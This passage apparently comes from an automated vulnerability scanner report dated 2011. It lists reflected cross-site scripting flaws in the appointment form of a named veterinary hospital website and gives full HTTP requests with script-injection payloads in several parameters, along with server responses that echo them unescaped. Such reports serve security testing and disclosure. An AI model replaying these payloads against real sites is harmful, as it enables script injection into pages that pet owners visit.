Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:47:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<body id="appt54666"><a>31d8f105f44">
...[SNIP]...

2.3. http://www.vcahospitals.com/hanson/appt.html [altphone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The value of the altphone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 624cd"><script>alert(1)</script>82000bb6032 was submitted in the altphone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/appt.html?altphone=624cd"><script>alert(1)</script>82000bb6032&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:16 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=4udruo5a6bh9ud6vq7kq83b113; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="altphone" id="altphone" type="text" size="30" maxlength="20" value="624cd"><script>alert(1)</script>82000bb6032" />
...[SNIP]...

2.4. http://www.vcahospitals.com/hanson/appt.html [ampm1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The value of the ampm1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bae55"><script>alert(1)</script>803b193c3aa was submitted in the ampm1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/appt.html?altphone=&ampm1=AMbae55"><script>alert(1)</script>803b193c3aa&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:21 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=cr4nhjr58mse15chetc65pdm60; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?altphone=&ampm1=AMbae55"><script>alert(1)</script>803b193c3aa&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2
...[SNIP]...

2.5. http://www.vcahospitals.com/hanson/appt.html [ampm2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The value of the ampm2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddea7"><script>alert(1)</script>769a3fc6d44 was submitted in the ampm2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/appt.html?altphone=&ampm1=AM&ampm2=AMddea7"><script>alert(1)</script>769a3fc6d44&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:26 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=mig2fnj5prvum7phmej9acrtd7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?altphone=&ampm1=AM&ampm2=AMddea7"><script>alert(1)</script>769a3fc6d44&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.v
...[SNIP]...

2.6. http://www.vcahospitals.com/hanson/appt.html [ampm3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The value of the ampm3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a25b"><script>alert(1)</script>18b15d79637 was submitted in the ampm3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM2a25b"><script>alert(1)</script>18b15d79637&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:31 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=795pv82b0poc4jb53dq6ne47c3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM2a25b"><script>alert(1)</script>18b15d79637&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospita
...[SNIP]...

2.7. http://www.vcahospitals.com/hanson/appt.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 994c2"><script>alert(1)</script>860b1adcd7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/appt.html?994c2"><script>alert(1)</script>860b1adcd7c=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20916

